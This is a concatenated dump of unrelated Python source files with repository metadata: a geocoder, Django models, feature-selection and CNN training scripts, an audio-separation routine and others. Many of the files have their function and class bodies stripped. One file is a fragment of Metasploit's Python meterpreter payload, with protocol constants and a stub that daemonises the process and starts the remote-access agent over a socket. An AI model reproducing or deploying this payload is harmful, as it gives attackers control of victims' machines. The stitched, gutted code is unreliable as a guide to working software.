m = [1,1,1,1,1,1,1,1,1,1]
masks.append(m)

# Flatten the pattern and mask rows into the protobuf repeated fields.
for p in patterns:
    for v in p:
        rd.data.append(v)
for p in masks:
    for v in p:
        rd.mask.append(v)

rd.data_rows = len(patterns)
rd.data_cols = DIM_HCU
rd.mask_rows = len(masks)
rd.mask_cols = DIM_HCU

# Serialize the stimulus data to the requested output file.
with open(filename, "wb+") as f:
    f.write(rd.SerializeToString())
| 25.643836 | 115 | 0.744658 |
b81231fb69c94c906db0d3069a6a4df0633be007 | 174 | py | Python | python/find_country/city.py | lukasjoc/scritps | ebcffef0a3977ab8bb1bebf20383c350bd7baa37 | [
"0BSD"
] | 1 | 2020-11-09T19:32:43.000Z | 2020-11-09T19:32:43.000Z | python/find_country/city.py | lukasjoc/scritps | ebcffef0a3977ab8bb1bebf20383c350bd7baa37 | [
"0BSD"
] | null | null | null | python/find_country/city.py | lukasjoc/scritps | ebcffef0a3977ab8bb1bebf20383c350bd7baa37 | [
"0BSD"
] | null | null | null | #!/usr/bin/env python3
# Geocode the city "Munich" via OpenStreetMap's Nominatim service and print
# its coordinates. Requires the third-party `geopy` package and network access.
from geopy.geocoders import Nominatim
locator = Nominatim(user_agent="getcity")  # a custom user_agent string is passed to the service
loc = locator.geocode("Munich")  # NOTE(review): geocode can return None on failure -- would raise AttributeError below
print(loc.latitude, loc.longitude)
| 17.4 | 41 | 0.764368 |
b8126bfcea007e0faa9e48fd38823790a37c5d11 | 6,448 | py | Python | bitio/src/microbit/repl/repl.py | hungjuchen/Atmosmakers | 4e8e64fba3d7a31840f69a5aa3823247aa5dca02 | [
"MIT"
] | 85 | 2017-06-09T20:53:46.000Z | 2022-03-09T21:35:05.000Z | bitio/src/microbit/repl/repl.py | hungjuchen/Atmosmakers | 4e8e64fba3d7a31840f69a5aa3823247aa5dca02 | [
"MIT"
] | 34 | 2017-06-09T20:52:05.000Z | 2021-02-19T19:49:45.000Z | bitio/src/microbit/repl/repl.py | hungjuchen/Atmosmakers | 4e8e64fba3d7a31840f69a5aa3823247aa5dca02 | [
"MIT"
] | 32 | 2017-06-09T10:15:19.000Z | 2021-11-20T09:08:08.000Z | # repl/repl.py
#
# A REPL interface to a micro:bit or similar device running MicroPython
# This is written on top of pyserial, however the dependency on pyserial
# is soft (as the serial instance is passed in as a constructor parameter
# and the detection of the need to bytes-encode strings is dynamic).
# Thus you can pass in any object that implements the following interface:
# write(str)
# read()-> str
# and/or this interface:
# write(bytes)
# read()->bytes
import time
import re
# END
| 35.234973 | 108 | 0.563896 |
b814083d787036eed69c0998c2575b86f722e9ca | 3,172 | py | Python | src/cocoannot/annotpreferred/models.py | coco-tasks/annotation-tool | ebd2e77ec8aeddedb9f87f457b6d5d8989b602db | [
"MIT"
] | 9 | 2019-04-18T15:35:38.000Z | 2021-06-07T08:01:27.000Z | src/cocoannot/annotpreferred/models.py | coco-tasks/annotation-tool | ebd2e77ec8aeddedb9f87f457b6d5d8989b602db | [
"MIT"
] | 1 | 2019-07-16T10:07:09.000Z | 2019-07-16T10:07:09.000Z | src/cocoannot/annotpreferred/models.py | coco-tasks/annotation-tool | ebd2e77ec8aeddedb9f87f457b6d5d8989b602db | [
"MIT"
] | 3 | 2020-05-20T12:06:59.000Z | 2020-12-12T06:45:26.000Z | from django.contrib.auth.models import User
from django.db import models
from markdownx.models import MarkdownxField
| 33.041667 | 108 | 0.698298 |
b81415a0a71fcac22aeb01aa39ba0c4dc0f68e8c | 13,866 | py | Python | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2015-11-05T21:38:38.000Z | 2015-11-05T21:38:38.000Z | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import code
import ctypes
import os
import random
import select
import socket
import struct
import subprocess
import sys
import threading
has_windll = hasattr(ctypes, 'windll')
#
# Constants
#
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
os.setsid()
met = PythonMeterpreter(s)
met.run()
| 33.737226 | 134 | 0.706044 |
b814b973d8e54a857c2c3fc248c1064d45ba00c1 | 8,599 | py | Python | utils/dev/feature.py | brunocvs7/bot_detection_twitter_profile_features | 44a88b0774bdab33da78f7679e109ccd8c34f4df | [
"MIT"
] | 1 | 2021-11-03T02:22:57.000Z | 2021-11-03T02:22:57.000Z | utils/dev/feature.py | brunocvs7/bot_detection_twitter_profile_features | 44a88b0774bdab33da78f7679e109ccd8c34f4df | [
"MIT"
] | null | null | null | utils/dev/feature.py | brunocvs7/bot_detection_twitter_profile_features | 44a88b0774bdab33da78f7679e109ccd8c34f4df | [
"MIT"
] | 1 | 2021-11-01T00:49:07.000Z | 2021-11-01T00:49:07.000Z | from sklearn.preprocessing import MinMaxScaler
from sklearn.pipeline import Pipeline
from scipy.stats import chi2_contingency
from sklearn.compose import ColumnTransformer
from boruta import BorutaPy
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import OrdinalEncoder
from sklearn.impute import SimpleImputer
from scipy.stats import pointbiserialr
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import StratifiedKFold, cross_val_score
import pandas as pd
import numpy as np
def point_biserial(df, y, num_columns=None, significance=0.05):
    """
    Perform feature selection based on the point-biserial correlation test.

    For each numerical column, the point-biserial correlation against the
    binary target and its p-value are computed. Columns whose test fails to
    reject the null hypothesis of no correlation (p-value above the
    significance level) are flagged for removal.

    Missing values are imputed with the column median on a copy of each
    column; unlike the previous revision, the caller's dataframe is not
    modified in place.

    Parameters:
        df (pandas.DataFrame): A dataframe containing all features and the target.
        y (string): Name of the binary target column.
        num_columns (list): Names of the numerical feature columns. If None or
            empty, numerical columns are inferred from the dataframe dtypes.
        significance (float): Significance level of the test. Default is 0.05.

    Returns:
        pb_df (pandas.DataFrame): One row per tested column with its
            correlation, p_value and test result.
        columns_remove_pb (list): Columns for which H0 was accepted
            (no significant correlation), i.e. removal candidates.
    """
    if not num_columns:
        # Infer numerical feature columns from the dtypes.
        num_columns = df.select_dtypes(include=['int', 'float', 'int32', 'float64']).columns.tolist()

    correlations = []
    p_values = []
    results = []
    for col in num_columns:
        # Median-impute missing values without mutating the caller's dataframe.
        series = df[col].fillna(df[col].median())
        corr, p_value = pointbiserialr(series, df[y])
        correlations.append(corr)
        p_values.append(p_value)
        results.append('Reject H0' if p_value <= significance else 'Accept H0')

    pb_df = pd.DataFrame({'column': num_columns, 'correlation': correlations,
                          'p_value': p_values, 'result': results})
    columns_remove_pb = pb_df.loc[pb_df['result'] == 'Accept H0']['column'].values.tolist()
    return pb_df, columns_remove_pb
def chi_squared(df, y, cat_columns=None, significance=0.05):
    """
    Perform chi-squared tests of independence between categorical predictors and the target.

    Columns whose contingency table has any observed cell count below 5 are
    skipped (the chi-squared approximation is unreliable there): they are
    reported in ``logs`` and receive NaN statistics. Because a NaN p-value
    never satisfies ``p <= significance``, such columns end up marked
    'Accept H0' and are also included in the removal list.

    Parameters:
        df (pandas.DataFrame): A data frame containing the categorical features and the target.
        y (string): Name of the target column.
        cat_columns (list): Names of the categorical feature columns. If None,
            all object-dtype columns are used.
        significance (float): Significance level for the test. Default is 0.05.

    Returns:
        chi2_df (pandas.DataFrame): One row per column with chi2 statistic, p-value and result.
        columns_remove_chi2 (list): Columns whose test accepted H0 (removal candidates).
        logs (list): Messages for columns that could not be evaluated.
    """
    if cat_columns is None:
        cat_columns = df.select_dtypes(['object']).columns.tolist()

    p_values = []
    chi2_results = []
    logs = []
    for cat in cat_columns:
        cross_table = pd.crosstab(df[cat], df[y])
        # Every observed cell count must be >= 5 for the test to be valid.
        # (The previous revision recomputed the crosstab here redundantly.)
        if not cross_table[cross_table < 5].count().any():
            chi2, p, dof, expected = chi2_contingency(cross_table.values)
            chi2_results.append(chi2)
            p_values.append(p)
        else:
            logs.append("Column {} couldn't be evaluated".format(cat))
            chi2_results.append(np.nan)
            p_values.append(np.nan)

    # NaN <= significance is False, so skipped columns fall into 'Accept H0'.
    results = ['Reject H0' if p <= significance else 'Accept H0' for p in p_values]

    chi2_df = pd.DataFrame({"column": cat_columns, 'p-value': p_values,
                            'chi2': chi2_results, 'results': results})
    columns_remove_chi2 = chi2_df.loc[chi2_df['results'] == 'Accept H0']['column'].values.tolist()
    return chi2_df, columns_remove_chi2, logs
b814f40aa31389fa14c7b83364d7da4918d56140 | 6,293 | py | Python | apiserver/apiserver/web/challenge.py | AlexParra03/Halite-III | 1f108a0d9a07397400621e9a7ccefd7f4f13fee2 | [
"MIT"
] | 1 | 2021-07-01T20:57:24.000Z | 2021-07-01T20:57:24.000Z | apiserver/apiserver/web/challenge.py | the-higgs/Halite-III | 1f108a0d9a07397400621e9a7ccefd7f4f13fee2 | [
"MIT"
] | null | null | null | apiserver/apiserver/web/challenge.py | the-higgs/Halite-III | 1f108a0d9a07397400621e9a7ccefd7f4f13fee2 | [
"MIT"
] | null | null | null | """
User challenge API endpoints - list user's challenges & issue new ones
"""
import datetime
import flask
import sqlalchemy
from .. import model, util
from . import match as match_api
from . import util as api_util
from .blueprint import web_api
| 36.587209 | 87 | 0.622755 |
b8155fb4487ab6eefaea72ef47aa753b0a19b9bd | 264 | py | Python | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 1 | 2020-12-08T19:00:33.000Z | 2020-12-08T19:00:33.000Z | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 3 | 2021-03-30T13:47:03.000Z | 2021-09-22T19:03:46.000Z | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 1 | 2020-04-24T14:39:03.000Z | 2020-04-24T14:39:03.000Z | from django.conf import settings
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('txt-jokes-administratus/', admin.site.urls),
path('accounts/', include('allauth.urls')),
path('', include('pages.urls')),
]
| 24 | 54 | 0.704545 |
b8180b5b5c77d3a1a684f4f02028d017f4b7a210 | 1,909 | py | Python | newsservice/requestnews.py | mohawk781/newsservice | 0b7007c632211e35000dfba5e8ff9f23cff9450d | [
"Apache-2.0"
] | null | null | null | newsservice/requestnews.py | mohawk781/newsservice | 0b7007c632211e35000dfba5e8ff9f23cff9450d | [
"Apache-2.0"
] | 1 | 2021-06-01T23:59:17.000Z | 2021-06-01T23:59:17.000Z | newsservice/requestnews.py | mohawk781/newsservice | 0b7007c632211e35000dfba5e8ff9f23cff9450d | [
"Apache-2.0"
] | 1 | 2019-09-06T10:51:08.000Z | 2019-09-06T10:51:08.000Z | import json
from newsservice.models import News
from flask import (Blueprint, request)
bp = Blueprint('request', __name__)
| 38.959184 | 133 | 0.655317 |
b8185170e7135ee17602f233ff3d6eb5d6bbc140 | 943 | py | Python | tests/test_lexer.py | movermeyer/rexlex | 6c451a3b7e9134cbdf895a7ec5682e480480ef1a | [
"BSD-3-Clause"
] | null | null | null | tests/test_lexer.py | movermeyer/rexlex | 6c451a3b7e9134cbdf895a7ec5682e480480ef1a | [
"BSD-3-Clause"
] | null | null | null | tests/test_lexer.py | movermeyer/rexlex | 6c451a3b7e9134cbdf895a7ec5682e480480ef1a | [
"BSD-3-Clause"
] | 1 | 2018-03-05T00:40:04.000Z | 2018-03-05T00:40:04.000Z | import re
import unittest
from rexlex import Lexer
from rexlex.lexer.itemclass import get_itemclass
| 21.930233 | 54 | 0.510074 |
b8187e4887ed852a5b867debdeeccee5408895fe | 7,134 | py | Python | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | 2 | 2018-02-05T12:41:31.000Z | 2018-11-23T04:13:13.000Z | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | import unittest
import numpy as np
import utils.imageutils as imgutils
import utils.numpyutils as nputils
from algorithms.neuralnetwork.convolutional.conv_net import ConvNet
from datahandler.numerical.NumericalDataSet import NumericalDataSet
import utils.serialization as srlztn
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main() | 49.2 | 158 | 0.610457 |
b819490a0e749fdb6fa33717dab9405f34226e11 | 2,747 | py | Python | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | null | null | null | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | 23 | 2017-08-25T16:48:57.000Z | 2022-02-16T00:55:42.000Z | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | 13 | 2017-07-03T09:15:36.000Z | 2021-07-02T07:43:10.000Z | import requests
from requests.auth import HTTPBasicAuth
import sys
import os
from string import rfind
import base64 | 32.702381 | 127 | 0.581361 |
b81a09ef1cba709f702bd49fe66d6f2697a395a3 | 5,736 | py | Python | handy/2011722086_Assign3/main_app.py | HDNua/kwin | 33ce866c2b37faa1a5940354a0e5b3919e5eecc8 | [
"MIT"
] | 2 | 2017-11-01T12:46:06.000Z | 2017-12-02T04:01:25.000Z | handy/2011722086_Assign3/main_app.py | HDNua/kwin | 33ce866c2b37faa1a5940354a0e5b3919e5eecc8 | [
"MIT"
] | null | null | null | handy/2011722086_Assign3/main_app.py | HDNua/kwin | 33ce866c2b37faa1a5940354a0e5b3919e5eecc8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue May 30 16:43:10 2017
provided code
@author: Minsooyeo
"""
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
from PIL import Image as im
import numpy as np
import utills as ut
import tensorflow as tf
sess = tf.InteractiveSession()
train_epoch = 5000
#
FLAG_FINGER = 0
FLAG_FACE = 1
FLAG_ANGLE = 2
flag = FLAG_ANGLE
#
if flag is FLAG_FINGER:
class_num = 5
additional_path = '\\finger\\'
elif flag is FLAG_FACE:
class_num = 6
additional_path = '\\face\\'
elif flag is FLAG_ANGLE:
class_num = 4
additional_path = '\\angle\\'
else:
raise Exception("Unknown flag %d" %flag)
# define parameter
data_length = []
dir_image = []
data = []
label = []
data_shape = [298, 298]
current_pwd = os.getcwd()
for i in range(class_num):
dir_image.append(ut.search(current_pwd + additional_path + str(i + 1)))
data_length.append(len(dir_image[i]))
data.append(np.zeros([data_length[i], data_shape[1], data_shape[0]]))
label.append(np.zeros([data_length[i], class_num]))
label[i][:, i] = 1
# load data
for q in range(class_num):
for i in range(data_length[q]):
if i % 100 == 0:
print("%dth data is opening" %i)
data[q][i, :, :] = np.mean(im.open(current_pwd + additional_path + str(q + 1) + '\\' + dir_image[q][i]), -1)
if flag is FLAG_FINGER:
rawdata = np.concatenate((data[0], data[1], data[2], data[3], data[4]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3], label[4]), axis=0)
elif flag is FLAG_FACE:
rawdata = np.concatenate((data[0], data[1], data[2], data[3], data[4], data[5]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3], label[4], label[5]), axis=0)
elif flag is FLAG_ANGLE:
rawdata = np.concatenate((data[0], data[1], data[2], data[3]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3]), axis=0)
else:
raise Exception("Unknown class number %d" %class_num)
del data
del label
total_data_poin = rawdata.shape[0]
permutation = np.random.permutation(total_data_poin)
rawdata = rawdata[permutation, :, :]
raw_label = raw_label[permutation, :]
rawdata = np.reshape(rawdata, [rawdata.shape[0], data_shape[0] * data_shape[1]])
########################################################################################################
#
img_width = data_shape[0]
img_height = data_shape[1]
# Per-task train/test split sizes. The original comments here were mojibake
# (non-ASCII characters lost); their surviving fragments suggest the sizes
# were tuned by hand -- TODO confirm against the assignment material.
if flag is FLAG_FINGER:
    train_count = 5000  # original (garbled) note mentions choosing between 2000 and 5000
    test_count = 490
elif flag is FLAG_FACE:
    train_count = 2000  # original note: 5000 training samples led to overfitting / NaN
    test_count = 490
elif flag is FLAG_ANGLE:
    train_count = 6000  # original note: 5000 training samples led to overfitting / NaN
    test_count = 1000
else:
    raise Exception("unknown flag %d" %flag)
#
train_epoch = train_count
#
TrainX = rawdata[:train_count] # mnist.train.images
TrainY = raw_label[:train_count] # mnist.train.labels
testX = rawdata[train_count:train_count+test_count] # mnist.test.images
testY = raw_label[train_count:train_count+test_count] # mnist.test.labels
# else .
if flag is FLAG_FINGER: # .
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[3, 2, 32, True],
[3, 2, 64, True],
[3, 2, 128, True],
[3, 2, 64, True],
[3, 2, 128, True],
# [3, 2, 128, True],
])
elif flag is FLAG_FACE: # 2 . .
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[3, 2, 32, True],
[3, 2, 64, True],
# [3, 2, 128, True],
# [3, 2, 64, True],
# [3, 2, 128, True],
# [3, 2, 128, True],
])
elif flag is FLAG_ANGLE: #
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[1, 1, 32, True],
# [1, 1, 64, True],
# [1, 1, 128, True],
# [1, 1, 64, True],
# [1, 1, 128, True],
# [3, 2, 128, True],
])
else:
raise Exception("Unknown flag %d" %flag)
FlatModel = ut._FlatModel(CNNModel, fc_outlayer_count=128)
DropOut, keep_prob = ut._DropOut(FlatModel)
SoftMaxModel = ut._SoftMax(DropOut, label_count=class_num, fc_outlayer_count=128)
TrainStep, Accuracy, y_, correct_prediction = ut._SetAccuracy(SoftMaxModel, label_count=class_num)
sess.run(tf.global_variables_initializer())
# Training loop: draw a random mini-batch of 50 samples per step and report
# accuracy every 100 steps.
for i in range(train_epoch):
    tmp_trainX, tmp_trainY = ut.Nextbatch(TrainX, TrainY, 50)
    if i%100 == 0:
        # Accuracy is measured on the current training batch (not a held-out
        # set), with dropout disabled (keep_prob=1.0).
        train_accuracy = Accuracy.eval(feed_dict={x: tmp_trainX, y_: tmp_trainY, keep_prob: 1.0})
        print("step %d, training accuracy %g"%(i, train_accuracy))
    TrainStep.run(feed_dict={x: tmp_trainX, y_: tmp_trainY, keep_prob: 0.7})  # keep 70% of units during training
# Final evaluation on up to 999 test samples; index 0 is skipped by the
# slice [1:1000] -- possibly unintentional.
print("test accuracy %g" %Accuracy.eval(feed_dict={x: testX[1:1000, :], y_: testY[1:1000], keep_prob: 1.0}))
b81de3e83d88be8e9727e5be630e392a0dd09037 | 3,176 | py | Python | ilrma.py | annie-gu/MVAE | 252b052d69eae9a0b47f4058baf0fe565992f12f | [
"MIT"
] | 1 | 2022-01-08T03:31:31.000Z | 2022-01-08T03:31:31.000Z | ilrma.py | annie-gu/MVAE | 252b052d69eae9a0b47f4058baf0fe565992f12f | [
"MIT"
] | null | null | null | ilrma.py | annie-gu/MVAE | 252b052d69eae9a0b47f4058baf0fe565992f12f | [
"MIT"
] | 2 | 2020-06-21T12:55:53.000Z | 2020-11-16T00:56:36.000Z | import numpy as np
from common import projection_back
EPS = 1e-9
def ilrma(mix, n_iter, n_basis=2, proj_back=True):
    """Implementation of ILRMA (Independent Low-Rank Matrix Analysis).

    This algorithm is called ILRMA1 in
    http://d-kitamura.net/pdf/misc/AlgorithmsForIndependentLowRankMatrixAnalysis.pdf
    It only works in determined case (n_sources == n_channels).

    Note: the NMF factors are initialized from numpy's global RNG, so runs
    are only reproducible if the caller seeds ``numpy.random``.

    Args:
        mix (numpy.ndarray): (n_frequencies, n_channels, n_frames)
            STFT representation of the observed signal.
        n_iter (int): Number of iterations.
        n_basis (int): Number of basis in the NMF model.
        proj_back (bool): If use back-projection technique.

    Returns:
        tuple[numpy.ndarray, numpy.ndarray]: Tuple of separated signal and
            separation matrix. The shapes of separated signal and separation
            matrix are (n_frequencies, n_sources, n_frames) and
            (n_sources, n_channels), respectively.
    """
    n_freq, n_src, n_frame = mix.shape

    # One demixing matrix per frequency bin, initialized to identity.
    sep_mat = np.stack([np.eye(n_src, dtype=mix.dtype) for _ in range(n_freq)])
    # Random nonnegative NMF factors: model[s] = basis[s] @ act[s].
    basis = np.abs(np.random.randn(n_src, n_freq, n_basis))
    act = np.abs(np.random.randn(n_src, n_basis, n_frame))

    sep = sep_mat @ mix
    sep_pow = np.power(np.abs(sep), 2)  # (n_freq, n_src, n_frame)
    model = basis @ act  # (n_src, n_freq, n_frame)
    m_reci = 1 / model  # cached reciprocal of the NMF variance model
    eye = np.tile(np.eye(n_src), (n_freq, 1, 1))

    for _ in range(n_iter):
        for src in range(n_src):
            # --- NMF multiplicative updates for this source's basis ---
            h = (sep_pow[:, src, :] * m_reci[src]**2) @ act[src].T
            h /= m_reci[src] @ act[src].T
            h = np.sqrt(h, out=h)
            basis[src] *= h
            # Clamp away from zero so 1/model below stays finite.
            np.clip(basis[src], a_min=EPS, a_max=None, out=basis[src])

            model[src] = basis[src] @ act[src]
            m_reci[src] = 1 / model[src]

            # --- NMF multiplicative updates for the activations ---
            h = basis[src].T @ (sep_pow[:, src, :] * m_reci[src]**2)
            h /= basis[src].T @ m_reci[src]
            h = np.sqrt(h, out=h)
            act[src] *= h
            np.clip(act[src], a_min=EPS, a_max=None, out=act[src])

            model[src] = basis[src] @ act[src]
            m_reci[src] = 1 / model[src]

            # --- Demixing-matrix update (iterative projection) ---
            # Broadcast the per-bin model weights across channels, then form
            # the weighted covariance u_mat of shape (n_freq, n_src, n_src).
            h = m_reci[src, :, :, None] @ np.ones((1, n_src))
            h = mix.conj() @ (mix.swapaxes(1, 2) * h)
            u_mat = h.swapaxes(1, 2) / n_frame
            # Solve for the new demixing row; EPS*eye regularizes the solve.
            h = sep_mat @ u_mat + EPS * eye
            sep_mat[:, src, :] = np.linalg.solve(h, eye[:, :, src]).conj()
            # Normalize the row so that w^H U w == 1.
            h = sep_mat[:, src, None, :] @ u_mat
            h = (h @ sep_mat[:, src, :, None].conj()).squeeze(2)
            sep_mat[:, src, :] = (sep_mat[:, src, :] / np.sqrt(h).conj())

        # Refresh the separated signal and its power spectrogram in place.
        np.matmul(sep_mat, mix, out=sep)
        np.power(np.abs(sep), 2, out=sep_pow)
        np.clip(sep_pow, a_min=EPS, a_max=None, out=sep_pow)

        # Rescale each source to unit average power; the NMF model and basis
        # are divided by lbd**2 so model == E[|sep|^2] is preserved.
        for src in range(n_src):
            lbd = np.sqrt(np.sum(sep_pow[:, src, :]) / n_freq / n_frame)
            sep_mat[:, src, :] /= lbd
            sep_pow[:, src, :] /= lbd ** 2
            model[src] /= lbd ** 2
            basis[src] /= lbd ** 2

    # Back-projection technique: resolve the per-frequency scale ambiguity
    # against reference channel 0 (projection_back is a project helper).
    if proj_back:
        z = projection_back(sep, mix[:, 0, :])
        sep *= np.conj(z[:, :, None])

    return sep, sep_mat
| 37.809524 | 119 | 0.55699 |
b81ecc580a437a3d551ab5dfa4a59c26d6b5e052 | 367 | py | Python | tests/routes/test_pages.py | Biosystems-Analytics-Lab/shellcast | 8d578bfa3d66d75502f1a133fe6263d376694247 | [
"CC-BY-4.0"
] | 5 | 2021-03-24T19:19:48.000Z | 2022-01-11T09:27:13.000Z | tests/routes/test_pages.py | Biosystems-Analytics-Lab/shellcast | 8d578bfa3d66d75502f1a133fe6263d376694247 | [
"CC-BY-4.0"
] | 1 | 2022-01-13T15:11:09.000Z | 2022-01-13T21:16:10.000Z | tests/routes/test_pages.py | Biosystems-Analytics-Lab/shellcast | 8d578bfa3d66d75502f1a133fe6263d376694247 | [
"CC-BY-4.0"
] | null | null | null | import pytest
| 20.388889 | 34 | 0.700272 |
b81fcb30f8bd89568af442548e95ceeba2331cfd | 412 | py | Python | Task -01/loop.py | kanzul12/cp19_voice_detector | db5478b118bab46897b4230d366e11b9ad65e0ce | [
"MIT"
] | 2 | 2019-04-19T08:26:09.000Z | 2019-04-30T12:52:58.000Z | Task -01/loop.py | kanzul12/cp19_voice_detector | db5478b118bab46897b4230d366e11b9ad65e0ce | [
"MIT"
] | 5 | 2019-05-03T07:47:35.000Z | 2019-05-13T08:37:11.000Z | Task -01/loop.py | kanzul12/cp19_voice_detector | db5478b118bab46897b4230d366e11b9ad65e0ce | [
"MIT"
] | null | null | null | num= int (input("enter number of rows="))
# Pattern 1: for each of the `num` rows (num was read from input() above),
# print num-i leading spaces, then print the pair "2 9" nine times, one pair
# per line.
# NOTE(review): `range(2 and 9)` evaluates to `range(9)` because `2 and 9`
# is simply 9 -- this is almost certainly not what was intended.
for i in range (1,num+1):
    for j in range(1,num-i+1):
        print (" ",end="")
    for j in range(2 and 9):
        print("2","9")
# Pattern 2: a 5-row by 9-column character grid: stars on the last row
# (i==5), on the anti-diagonal (i+j==5) and on the diagonal (j-i==4),
# spaces elsewhere.
for i in range(1, 6):
    for j in range(1, 10):
        if i==5 or i+j==5 or j-i==4:
            print("*", end="")
        else:
            print(end=" ")
    print()
| 16.48 | 44 | 0.383495 |
6293f58cd98657d8f6c935c1d17ddd8632667efa | 4,819 | py | Python | examples/racing/models/HyperNN.py | Chris-Carvelli/DeepNeuroevolution | 72e11fd08273ee1b25c346abd90b76a5975c39db | [
"MIT"
] | null | null | null | examples/racing/models/HyperNN.py | Chris-Carvelli/DeepNeuroevolution | 72e11fd08273ee1b25c346abd90b76a5975c39db | [
"MIT"
] | null | null | null | examples/racing/models/HyperNN.py | Chris-Carvelli/DeepNeuroevolution | 72e11fd08273ee1b25c346abd90b76a5975c39db | [
"MIT"
] | 1 | 2021-05-14T15:08:15.000Z | 2021-05-14T15:08:15.000Z | import random
import math
from functools import reduce
import torch
import torch.nn as nn
| 32.782313 | 87 | 0.552812 |
62961303726bbf57667dd5ce6020b5b0a4afb7e5 | 8,351 | py | Python | O.py | duongnguyenkt11/data-realtime | 9d8f6c8e0f6a766c058d0696669543dbafaff63c | [
"MIT"
